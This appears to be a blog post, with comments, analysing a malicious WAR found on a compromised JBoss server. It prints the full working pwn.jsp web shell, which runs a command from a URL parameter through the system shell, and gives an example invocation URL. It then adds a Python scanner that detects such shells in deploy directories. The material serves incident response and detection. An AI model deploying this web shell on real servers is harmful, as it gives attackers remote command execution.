We found the following hack on our old JBoss server this morning:
/path/to/jboss/server/mydomain/deploy/tmp5177256507206829158a-exp.war
The WAR has the following package structure:
├── META-INF
│   └── MANIFEST.MF
├── pwn.jsp
└── WEB-INF
    ├── lib
    └── web.xml
pwn.jsp:
<%@ page import="java.util.*,java.io.*"%>
<%
    String cmd;
    String[] cmdarr;
    String OS = System.getProperty("os.name");
    // Only acts when a "cmd" request parameter is present
    if (request.getParameter("cmd") != null) {
        cmd = new String (request.getParameter("cmd"));
        // Picks the platform shell so the same page works on Windows and Unix
        if (OS.startsWith("Windows")) {
            cmdarr = new String [] {"cmd", "/C", cmd};
        }
        else {
            cmdarr = new String [] {"/bin/sh", "-c", cmd};
        }
        // Runs the attacker-supplied string as the user the JBoss process runs as
        Process p = Runtime.getRuntime().exec(cmdarr);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        // Streams the command's stdout back into the HTTP response
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>
web.xml:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
    PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
    "http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
</web-app>
Once this WAR is deployed, shell commands can be run through a URL like this:
http://localhost:8080/tmp5177256507206829158a-exp/pwn.jsp?cmd=touch%20~/test
This creates a file called test in the home directory.
The hacker cannot, however, run any sudo commands, and can only run commands as the user that JBoss is running as.
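As an added example (not part of the original post), a small Python triage scanner for a JBoss deploy/ directory: it flags archives whose name follows the tmp<digits>...-exp.war pattern seen above and inspects every .jsp inside each WAR for the request-parameter-to-Runtime.exec idiom that pwn.jsp uses. The deploy directory, the two sample WARs and their JSP contents are constructed inside the script so it runs offline.

```python
import os
import re
import tempfile
import zipfile

# Name pattern of the dropped archive in the post: tmp<digits>...-exp.war
SUSPICIOUS_WAR_NAME = re.compile(r"^tmp\d+.*-exp\.war$")
# JSP idioms that hand an HTTP parameter to a process, as pwn.jsp does
EXEC_CALL = re.compile(r"Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder")
PARAM_READ = re.compile(r"request\.getParameter\(")

def scan_war(war_path):
    """Return (war_name, reason) findings for one .war archive."""
    findings = []
    name = os.path.basename(war_path)
    if SUSPICIOUS_WAR_NAME.match(name):
        findings.append((name, "suspicious archive name"))
    with zipfile.ZipFile(war_path) as war:
        for entry in war.namelist():
            if not entry.lower().endswith(".jsp"):
                continue
            src = war.read(entry).decode("utf-8", errors="replace")
            # Flag only when a request parameter and an exec call coexist
            if EXEC_CALL.search(src) and PARAM_READ.search(src):
                findings.append((name, "web shell idiom in " + entry))
    return findings

def scan_deploy_dir(deploy_dir):
    """Scan every .war directly under deploy_dir (sorted for stable output)."""
    findings = []
    for fname in sorted(os.listdir(deploy_dir)):
        if fname.endswith(".war"):
            findings.extend(scan_war(os.path.join(deploy_dir, fname)))
    return findings

def build_sample_deploy_dir():
    """Constructed fixture: a WAR shaped like the one found plus a benign one."""
    deploy = tempfile.mkdtemp(prefix="deploy-")
    shell_jsp = ('<% if (request.getParameter("cmd") != null) {'
                 ' Runtime.getRuntime().exec(request.getParameter("cmd")); } %>')
    with zipfile.ZipFile(os.path.join(deploy, "tmp5177256507206829158a-exp.war"), "w") as w:
        w.writestr("pwn.jsp", shell_jsp)
        w.writestr("WEB-INF/web.xml", "<web-app></web-app>")
    with zipfile.ZipFile(os.path.join(deploy, "myapp.war"), "w") as w:
        w.writestr("index.jsp", '<% out.println(request.getParameter("name")); %>')
    return deploy
```

Calling scan_deploy_dir(build_sample_deploy_dir()) reports the constructed tmp...-exp.war twice (once for its name, once for pwn.jsp) and nothing for myapp.war; point scan_deploy_dir at a real deploy/ directory to triage a server.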
See also:
http://i8jesus.com/?p=191
https://www.netspi.com/blog/entryid/126/hacking-with-jsp-shells
TODO:
run JBoss as the jboss user
Hi Nick, great post, but one small mistake:
this creates a folder called test in the home directory
this creates a file called test in the home directory

oops, thx, ur right :)
touch for files
mkdir for folders
;)
will fix it